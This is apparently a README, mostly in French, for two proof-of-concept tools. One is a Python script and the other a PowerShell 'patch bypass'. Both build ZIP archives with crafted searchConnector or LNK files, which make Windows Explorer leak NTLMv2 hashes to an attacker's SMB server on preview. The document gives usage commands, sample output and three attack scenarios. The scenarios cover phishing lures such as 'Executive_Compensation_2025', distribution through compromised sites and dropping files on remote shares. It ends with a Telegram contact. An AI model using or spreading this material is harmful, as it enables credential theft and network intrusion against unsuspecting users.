
Explorateur de fichiers Windows Zero Click Divulgation de hash NTLMv2-SSP
Cliquez sur l'image ci-dessus pour regarder la démonstration de la vulnérabilité
Le problème de sécurité fondamental réside dans le traitement automatique par l'Explorateur Windows des chemins UNC intégrés dans des formats de fichiers spécifiques lors des opérations de prévisualisation. Lorsque les utilisateurs ouvrent des archives ZIP contenant des fichiers spécialement conçus, l'Explorateur Windows résout automatiquement les chemins UNC sans le consentement de l'utilisateur, initiant des tentatives d'authentification SMB et exposant les hachages NTLMv2-SSP à des serveurs contrôlés par l'attaquant.
Fichier : ntlm-disclosure-poc.py
Cette première implémentation exploite les fichiers Windows Search Connector (.searchConnector-ms), qui sont des fichiers de configuration XML définissant les emplacements de recherche pour l'Explorateur Windows. La vulnérabilité se déclenche lorsque Windows traite automatiquement le chemin UNC intégré dans l'élément simpleLocation lors de l'aperçu d'une archive ZIP.
Caractéristiques techniques :
searchConnectorDescriptionFichier : patch_bypass.ps1
Cette technique améliorée contourne le correctif initial de Microsoft en exploitant les propriétés des fichiers LNK. L'attaque exploite le comportement de l'Explorateur Windows qui récupère les métadonnées d'icônes et résout les chemins cibles lors de l'aperçu d'un fichier ZIP, tout en maintenant le vecteur d'exploitation sans clic grâce à une configuration minutieuse des propriétés.
Caractéristiques techniques :
TargetPath3.6+colorama5.1+Set-ExecutionPolicy -ExecutionPolicy RemoteSigned -Scope CurrentUser# Basic usage
python ntml-disclosure-poc.py 192.168.1.100
# With custom output file
python ntml-disclosure-poc.py 192.168.1.100 -o some_data.zip
# Example output
[+] Listener: 192.168.1.100
[*] Resource path: \\192.168.1.100\sharedir
[*] COMPLETE Package: Project_20241125_143022.zip
[*] Output: PATH\Project_20251123_175037.zip
Parameters
target (required): Target IP address or hostname
-o, --output: Custom output filename for ZIP package
# Basic usage - LNK file auto-removed
.\bypass.ps1 -IP 192.168.1.100
# Keep LNK file for external distribution
.\bypass.ps1 -IP 192.168.1.100 -KeepLnk
# Custom lure name and share
.\bypass.ps1 -IP 192.168.1.100 -Share documents -File budget.xlsx -Lure FileName" -KeepLnk
# Specify output directory
.\bypass.ps1 -IP 192.168.1.100 -OutDir "C:\Payloads" -KeepLnk
Parameters
-IP (required): Target SMB server IP address
-Share: SMB share name (default: 'share')
-File: Target filename (default: 'payload.exe')
-Lure: Social engineering filename (default: 'Your_File_For_Payload_Here')
-OutDir: Output directory (default: current directory)
-KeepLnk: Preserve LNK file after ZIP creation
graph TD
A[🔴 CVE-2025-24054<br/>Initial Vulnerability] --> B[🛡️ Microsoft Patch]
B --> C[🟠 CVE-2025-50154<br/>Bypass #1]
C --> D[🛡️ Microsoft Patch]
D --> E[🟡 CVE-2025-59214<br/>Bypass #2]
E --> F[🔴 Current State<br/>Active Exploitation]
style A fill:#ffcccc
style C fill:#ffddcc
style E fill:#ffffcc
style F fill:#ccffcc📨 Scénario 1 : Distribution directe de ZIP
# Create ZIP payload
.\bypass.ps1 -IP 192.168.1.100 -Lure "Salary_Report_Q4_2025"
# Distribution vectors:
# - 📧 Email attachments with social engineering lures
# - ☁️ Compromised file sharing services
# - 🌐 Network share drops in enterprise environments
🔄 Scénario 2 : Transfert de fichier LNK
# Create and preserve LNK file for multi-host deployment
.\bypass.ps1 -IP 192.168.1.100 -Lure "Project_Documentation" -KeepLnk
# Cross-host deployment:
copy-item "Project_Documentation.lnk" "\\remote-server\share\"
# Web-based distribution via compromised sites
🎯 Scénario 3 : Ingénierie sociale ciblée
.\bypass.ps1 -IP 192.168.1.100 -Share "HR_Documents" -File "compensation_review.xlsx" -Lure "Executive_Compensation_2025" -KeepLnk
- Groupe et contact : t.me/initial_persistence
- Email : [email protected]
| Vecteur | Mécanisme de déclenchement | Interaction utilisateur | Statut du correctif |
|---|
| 🔗 SearchConnector | Analyse XML + résolution de chemin UNC | Ouverture du ZIP | 🛡️ Corrigé |
| 📎 LNK TargetPath | Récupération des métadonnées d'icône | Ouverture du ZIP | 🔴 Actif |